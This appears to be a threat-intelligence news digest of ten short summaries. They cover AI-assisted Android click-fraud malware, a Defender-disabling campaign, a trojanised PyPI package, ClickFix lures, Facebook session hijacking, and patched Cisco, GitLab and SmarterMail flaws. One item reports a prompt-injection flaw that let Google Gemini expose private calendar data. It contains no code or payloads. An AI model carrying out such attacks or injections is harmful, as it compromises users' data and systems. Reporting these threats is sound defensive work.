Attackers are clearly letting AI do the dirty work. Researchers have identified “Android.Phantom,” a sophisticated Android malware that leverages AI and machine learning to conduct automated ad-click fraud. In parallel, a separate multi-stage campaign targeting Russian users relies on social engineering and spoofed business documents to disable Microsoft Defender through registry manipulation and exploitation of Windows Security Center. Moreover, another AI-driven Android click-fraud trojan uses TensorFlow.js models to dynamically identify and interact with ad elements, bypassing traditional script-based detection. Keep reading further.
01
A new Android malware called "Android.Phantom" uses AI and machine learning to perform automated ad-clicking fraud and creates a persistent command-and-control system with two modes: "phantom" and "signaling."
02
A multi-stage malware campaign targeting Russian users leverages social engineering and fake business documents to disable Microsoft Defender via registry changes and abuse Windows Security Center trust assumptions.
03
A malicious PyPI package named “sympy-dev” was found impersonating the legitimate SymPy library, embedding cryptomining malware that abused specific polynomial routines to stealthily download and execute malicious payloads while minimizing system traces.
04
The ClearFake malware campaign uses fake CAPTCHA challenges on compromised websites to trick users into installing malware by leveraging the ClickFix technique, which prompts victims to execute malicious commands via keyboard shortcuts.
05
The large-scale “ClickFix” phishing campaign abuses Facebook’s verification and appeal workflows to hijack user sessions through social engineering, tricking victims into revealing session cookies, backup codes, and passwords.
06
A new Android click-fraud trojan uses TensorFlow.js machine learning models to detect and interact with advertisement elements, avoiding traditional script-based methods.
07
Researchers discovered a vulnerability in Google Gemini where a prompt injection could bypass Google Calendar's privacy controls, leading to unauthorized access to private meeting data and the creation of deceptive calendar events.
08
Cisco has patched a critical zero-day RCE vulnerability (CVE-2026-20045) in Unified Communications systems, including Webex Calling, that allows attackers to gain root access via improper validation of user-supplied HTTP input.
09
GitLab has patched multiple high-severity vulnerabilities in its Community and Enterprise Editions, including a 2FA bypass flaw (CVE-2026-0723) that enables authentication bypass via forged device responses and DoS vulnerabilities exploitable through crafted requests.
10
A critical authentication bypass flaw (WT-2026-0001) in SmarterTools SmarterMail was exploited within two days of patch release, allowing attackers to reset the system administrator password via a crafted HTTP request and execute OS commands with elevated privileges.
